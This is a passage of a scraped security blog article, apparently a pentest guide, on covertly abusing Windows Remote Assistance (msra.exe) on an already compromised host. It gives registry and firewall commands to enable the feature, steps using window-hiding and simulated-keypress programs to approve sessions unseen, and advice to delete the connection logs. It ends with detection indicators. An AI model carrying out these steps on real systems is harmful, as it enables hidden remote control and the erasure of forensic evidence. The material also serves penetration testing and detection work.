Window\\n\");\u003Cbr>\t}\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016743030_6_6efc8711f0-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Complete Exploitation Process\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Enable Remote Assistance\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Remote Assistance\" \u002Fv fAllowToGetHelp \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003Cbr>netsh advfirewall firewall set rule group=\"Remote Assistance\" new enable=Yes\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Run the interception program msra-hide.exe to hide the msra window\u003C\u002Fh3>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Ch3>3. Generate Remote Assistance invitation file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msra \u002Fsaveasfile c:\\test\\1.msrcIncident 123456789012\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Controller initiates connection\u003C\u002Fh3>\u003Cp>Obtain file 1.msrcIncident and execute, enter connection password\u003C\u002Fp>\u003Ch3>5. Run simulated keyboard input program msra-allow.exe to allow remote assistance\u003C\u002Fh3>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Ch3>6. Controller gains remote assistance desktop access\u003C\u002Fh3>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016745775_7_3edb7c80da-1.jpeg\">\u003C\u002Fp>\u003Ch3>7. Controller requests mouse operation permission from server\u003C\u002Fh3>\u003Cp>Select request control in the control interface\u003C\u002Fp>\u003Ch3>8. Run simulated keyboard input program msra-allow.exe again to allow mouse operation\u003C\u002Fh3>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Cp>Controller successfully gains control of server mouse\u003C\u002Fp>\u003Cp>At this point, successfully obtained desktop operation permissions on the target system\u003C\u002Fp>\u003Ch3>9. Clear connection records\u003C\u002Fh3>\u003Cp>Remote assistance log storage location: %SystemDrive%\\Users\\user_name\\Documents\\Remote Assistance Logs\u003C\u002Fp>\u003Cp>Naming convention: YYYYMMDDHHMMSS.xml (24-hour time format)\u003C\u002Fp>\u003Cp>Log files store connection timestamps\u003C\u002Fp>\u003Ch2>0x06 Detection Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The methods described in this article assume administrator privileges have been obtained, indicating the system has already been compromised\u003C\u002Fp>\u003Cp>Combined with exploitation approaches, detection can be performed through the following methods:\u003C\u002Fp>\u003Cul>\u003Cli>Registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\Remote Assistance modified\u003C\u002Fli>\u003Cli>Firewall rules modified\u003C\u002Fli>\u003Cli>Process msra.exe launched\u003C\u002Fli>\u003Cli>New folder %SystemDrive%\\Users\\user_name\\Documents\\Remote Assistance Logs created\u003C\u002Fli>\u003Cli>Abnormal open ports\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces Windows Remote Assistance functionality, implements covert execution through programming, and provides detection methods based on exploitation approaches\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",105,"Onedaysec",5,"published","2026-02-02T07:25:19.687Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Stealth Windows Remote Assistance Exploit & Detection Guide","Windows remote assistance, penetration testing, stealth execution, C++ exploit, remote desktop, msra.exe, security detection, command line remote access",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],1143,1142,1140,1139,{"title":39,"description":39,"image":39},"2026-07-24T15:37:09.305Z","2026-07-23T16:02:35.237Z","draft","2026-07-23T16:16:58.545Z"]